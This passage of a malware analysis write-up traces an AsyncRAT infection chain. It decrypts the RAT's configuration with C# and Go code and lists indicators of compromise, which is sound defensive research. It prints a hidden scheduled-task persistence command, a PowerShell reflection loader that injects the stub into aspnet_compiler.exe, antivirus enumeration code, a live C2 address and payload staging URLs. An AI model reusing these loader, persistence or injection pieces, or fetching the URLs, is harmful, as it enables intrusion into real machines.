        {
            bool flag = true;
            for (int index = 0; index < a1.Length; ++index)
            {
                if ((int)a1[index] != (int)a2[index])
                    flag = false;
            }
            return flag;
        }
    }
    class Program
    {
        public static string Ports = "t2nKOzYj0cOv2qg0u7nSEzre18jIRtMkff+A1fJwmx9S2cNE4bS0isw35a+elH8vvEeq9rxQQr8ctp7SXAHv+g==";
        public static string Hosts = "l1VDtNQHYKw7oyejimwLEz6zOLp1GHm1MdlVlcglHPTNq6anPKeOUkfpT/uMgKB+uioOQOcc9kSHroapCjYk9g==";
        public static string Version = "24o55NfpOilJhXezbajaIIb7jIZcr0rs/SWgCkY3w2BpRI/dWG+4pbVfe8DcM0IDLonhFKodRBDiDa7PvXUocg==";
        public static string Install = "fLeN4+ZnNpHyL2eJbS7qkLdXAUi7wgp7SAVvuTwoPFLJyCgnmbhGYImfzVCDWdQ2bj3EtNFOyUK8rlPbb0L7Xg==";
        public static string InstallFolder = "%AppData%";
        public static string InstallFile = "";
        public static string Key = "RFo5TjhDZjBwMHRLOWpuSHZqdkI5Wm5DcWJMVmE0RHQ=";
        public static string MTX = "b7qHN0k+Zdo1gIrDiUYyNSkb7tmNLp2Uoc3ePKH2RSO5qM74MOlyATBPU66ctkvwLGfAL76/CIAY3H5WLw1bZiqAbzogm+cj+kEXLR4OwQI=";
        public static string Certificate = "...";      // long base64 blob omitted here
        public static string Serversignature = "...";  // long base64 blob omitted here
        public static X509Certificate2 ServerCertificate;
        public static string Anti = "I9XbE9Y40w3b9h/252aXK3u3bOO9/cfbF48D4PqX1Nhx1lX3sAjOHSlPXNaUnA34kvPmCwiYwpKt2ButV3QDJA==";
        public static Aes256 aes256;
        public static string Pastebin = "H1jGb2NK/kGDPUld1Reh0VhfkUT1avpNoDOqgvb7luGqHBGAkWB+XsvBXESc5MCgrtFY7KXEB77kZ6jjFAQNJw==";
        public static string BDOS = "KBfTz24fL86ElK7C9Yl6ZE7mMLjov+CGSf7lapyRcxsTe2U9ODSTyXV0oxaYpKMxic5MiANIX2KW1MggpPYZuQ==";
        public static string Hwid = (string)null;
        public static string Delay = "3";
        public static string Group = "BDlmfJugzGq/Zshig+2ddnPtiMlHrM+OU7R4dJA1AHRRxVlTetFcwfD+oRsMM4JrDXDX/FrDKFh4Vtno15urKQ==";
        static void Main(string[] args)
        {
            Key = Encoding.UTF8.GetString(Convert.FromBase64String(Key));
            aes256 = new Aes256(Key);
            Console.WriteLine("Ports: " + aes256.Decrypt(Ports));
            Console.WriteLine("Hosts: " + aes256.Decrypt(Hosts));
            Console.WriteLine("Version: " + aes256.Decrypt(Version));
            Console.WriteLine("Install: " + aes256.Decrypt(Install));
            Console.WriteLine("MTX: " + aes256.Decrypt(MTX));
            Console.WriteLine("Pastebin: " + aes256.Decrypt(Pastebin));
            Console.WriteLine("Anti: " + aes256.Decrypt(Anti));
            Console.WriteLine("BDOS: " + aes256.Decrypt(BDOS));
            Console.WriteLine("Group: " + aes256.Decrypt(Group));
            Console.WriteLine("Hardware ID: " + HwidGen.HWID());
            Console.WriteLine("Serversignature: " + aes256.Decrypt(Serversignature));
            Console.WriteLine("Certificate: " + new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate))));
        }
    }
}

Cutting out the junk, here are the important config settings:

Data       Value
Ports      6666
Hosts      77.247.127.9
Version    0.5.7B
Install    FALSE
MTX        AsyncMutex_6SI8OkPnk
Pastebin   null
Anti       FALSE
BDOS       FALSE
Group      Default
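The same decryption can be done outside Visual Studio. The Go program below is an added example, not the post's code: it reimplements the Aes256 class (PBKDF2-HMAC-SHA1 over the hard-coded salt, HMAC-SHA256 over IV+ciphertext, AES-256-CBC with PKCS7) and decrypts the Ports and Hosts strings from the Settings class with the key above; the function names are mine.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// Salt hard-coded in the sample's Aes256 class (same 32 bytes as the decompiled C#).
var asyncRatSalt = []byte{
	191, 235, 30, 86, 251, 205, 151, 59, 178, 25, 2, 36, 48, 165, 120, 67,
	0, 61, 86, 68, 210, 30, 98, 185, 212, 241, 128, 231, 230, 195, 57, 65,
}

// Settings.Key and two encrypted fields, copied from the Settings class above.
const (
	settingsKeyB64 = "RFo5TjhDZjBwMHRLOWpuSHZqdkI5Wm5DcWJMVmE0RHQ="
	portsB64       = "t2nKOzYj0cOv2qg0u7nSEzre18jIRtMkff+A1fJwmx9S2cNE4bS0isw35a+elH8vvEeq9rxQQr8ctp7SXAHv+g=="
	hostsB64       = "l1VDtNQHYKw7oyejimwLEz6zOLp1GHm1MdlVlcglHPTNq6anPKeOUkfpT/uMgKB+uioOQOcc9kSHroapCjYk9g=="
)

// pbkdf2SHA1 reimplements Rfc2898DeriveBytes (PBKDF2 with HMAC-SHA1) using only the
// standard library; it returns keyLen bytes of the derived stream.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	idx := make([]byte, 4)
	var out []byte
	for block := uint32(1); len(out) < keyLen; block++ {
		prf.Reset()
		prf.Write(salt)
		binary.BigEndian.PutUint32(idx, block)
		prf.Write(idx)
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for n := 1; n < iter; n++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for i := range t {
				t[i] ^= u[i]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// DeriveKeys mirrors the Aes256 constructor: GetBytes(32) then GetBytes(64) read
// consecutively from one PBKDF2 stream, so derive 96 bytes and split them.
func DeriveKeys(masterKey []byte) (encKey, authKey []byte) {
	stream := pbkdf2SHA1(masterKey, asyncRatSalt, 50000, 96)
	return stream[:32], stream[32:]
}

// DecryptSetting reverses Aes256.Decrypt(string). Layout after base64 decoding:
// [32-byte HMAC-SHA256][16-byte IV][AES-256-CBC ciphertext, PKCS7 padded].
func DecryptSetting(masterKey []byte, b64 string) (string, error) {
	blob, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(blob) < 64 || (len(blob)-48)%aes.BlockSize != 0 {
		return "", errors.New("blob too short or ciphertext not block aligned")
	}
	encKey, authKey := DeriveKeys(masterKey)
	mac := hmac.New(sha256.New, authKey)
	mac.Write(blob[32:]) // the MAC covers IV + ciphertext, exactly as the C# does
	if !hmac.Equal(mac.Sum(nil), blob[:32]) {
		return "", errors.New("invalid message authentication code (MAC)")
	}
	block, err := aes.NewCipher(encKey)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(blob)-48)
	cipher.NewCBCDecrypter(block, blob[32:48]).CryptBlocks(pt, blob[48:])
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad PKCS7 padding")
	}
	return string(pt[:len(pt)-pad]), nil
}

func main() {
	key, _ := base64.StdEncoding.DecodeString(settingsKeyB64) // Settings.Key is itself base64
	for _, f := range [][2]string{{"Ports", portsB64}, {"Hosts", hostsB64}} {
		v, err := DecryptSetting(key, f[1])
		fmt.Printf("%s: %q (err=%v)\n", f[0], v, err)
	}
}
```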

And the RAT name, AsyncRAT Server, is found within the certificate:

[Subject]
  CN=AsyncRAT Server

[Issuer]
  CN=AsyncRAT Server

[Serial Number]
  00DE9B835DD0EAB90FEC5273F4631DF5

[Not Before]
  03/06/2021 00:45:37

[Not After]
  31/12/9999 23:59:59

[Thumbprint]
  63563ADE4CCFA1B2434777AC37EF9A0F3DF61ECB

Some additional checks it does:

AV enumeration with WMI:

public static string Antivirus()
{
  try
  {
    using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("\\\\" + Environment.MachineName + "\\root\\SecurityCenter2", "Select * from AntivirusProduct"))
    {
      List<string> stringList = new List<string>();
      foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
        stringList.Add(managementBaseObject["displayName"].ToString());
      return stringList.Count == 0 ? "N/A" : string.Join(", ", stringList.ToArray());
    }
  }
  catch
  {
    return "N/A";
  }
}

Schedules a new task:

Process.Start(new ProcessStartInfo()
{
FileName = "cmd",
Arguments = "/c schtasks /create /f /sc onlogon /rl highest /tn \"" + Path.GetFileNameWithoutExtension(fileInfo.Name) + "\" /tr '\"" + fileInfo.FullName + "\"' & exit",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
});

Finally, using dnSpy, this can be modified to remove all its checks so it can be properly scanned:

A full write-up on the RAT can be found in: Threat Analysis Unit (TAU) Threat Intelligence Notification: AsyncRAT by Carbon Black.

DLL

Now that the EXE has been covered, back to the DLL:

Looking through some classes:

Reminder of the strings:

Looking through this in dnSpy, it's a total mess. For example, empty methods:

// VBNET.PE
// Token: 0x06000070 RID: 112 RVA: 0x00002D08 File Offset: 0x00000F08
[MethodImpl(MethodImplOptions.NoInlining)]
internal static short aRWAgUbQDpqbtwUcV0k(object A_0, int \u0020, short \u0020, char \u0020)
{
    return 0;
}

Single externals:

// VBNET.PE
// Token: 0x06000061 RID: 97
[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext")]
private static extern bool B8aPhkAZx(IntPtr \u0020, int[] \u0020);

To debug this I would be setting a breakpoint on the allocation method:

// VBNET.PE
// Token: 0x06000065 RID: 101
[SuppressUnmanagedCodeSecurity]
[DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")]
private static extern int TrFvXFNaJ(IntPtr \u0020, int \u0020, int \u0020, int \u0020, int \u0020);

Anyway, there isn't much point in going deeper here: the Exe was called Stub, and this DLL is what loads that stub. This can be seen in the reflection loader command:

[Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run').Invoke($null,[object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$H1))

VBNET.PE and then the Run method, which is:

// VBNET.PE
// Token: 0x06000067 RID: 103 RVA: 0x00002C20 File Offset: 0x00000E20
[MethodImpl(MethodImplOptions.NoInlining)]
public static bool Run(string path, byte[] data)
{
    return true;
}

path is aspnet_compiler.exe, the host process that the Wow64SetThreadContext and VirtualAllocEx imports suggest the stub is injected into, and data is the Exe that's already been analysed.

Conclusion

Below are the files analysed and their hashes:

File                                                                  Stage  SHA256
cad5c70239b96f18505a52693349cc2c5d86df6da882602b0ab421f3ff269f2a.js  1      CAD5C70239B96F18505A52693349CC2C5D86DF6DA882602B0AB421F3FF269F2A
JyN.txt                                                               1      92BF8627F3603C744D115B6E85439F9EC3BC19AD4D4A45ED35E3F65C96511F0B
uDpmPTCcggnbTum9.jpg                                                  2      0F15805ED21A5277808AD5EA81F17CD733D253A55A9D11923EBB897EC6A36D5F
TutrZFMMnSRNVaOq.jpg                                                  3      DA1D96B03105B79BD4FCE2623458BE07DBDE68C63279AC3078E91CFE6A7EEABA
Stub.exe                                                              4      22B5BF913635BC456D04899B2AC3E26669C6FC450E2A0EB01A695A9F717BCC85
VBNET.dll                                                             4      91E89B9C89BEE655B18D596E4AEC6BD3D44658A2EA7CB90A97A018DA9E6DB858

RAT Config:

Config     Setting
Ports      6666
Hosts      77.247.127.9
Version    0.5.7B
Install    FALSE
MTX        AsyncMutex_6SI8OkPnk
Pastebin   null
Anti       FALSE
BDOS       FALSE
Group      Default

Certificate:

[Subject]
  CN=AsyncRAT Server

[Issuer]
  CN=AsyncRAT Server

[Serial Number]
  00DE9B835DD0EAB90FEC5273F4631DF5

[Not Before]
  03/06/2021 00:45:37

[Not After]
  31/12/9999 23:59:59

[Thumbprint]
  63563ADE4CCFA1B2434777AC37EF9A0F3DF61ECB

Files:

  1. cad5c70239b96f18505a52693349cc2c5d86df6da882602b0ab421f3ff269f2a.js
  2. JyN.txt
  3. uDpmPTCcggnbTum9.jpg
  4. TutrZFMMnSRNVaOq.jpg
  5. Stub.exe
  6. VBNET.dll

URLs:

  1. https://t.ly/3HaN
  2. https://hopkinsvillereunions.com/JyN.txt
  3. https://hopkinsvillereunions.com/wp-content/themes/uDpmPTCcggnbTum9.jpg
  4. https://hopkinsvillereunions.com/wp-content/themes/TutrZFMMnSRNVaOq.jpg
  5. https://cdn.discordapp.com/attachments/808540577594736675/852340086528147476/firefox.lnk
  6. https://cdn.discordapp.com/attachments/808540577594736675/852340062045077534/firefox.bat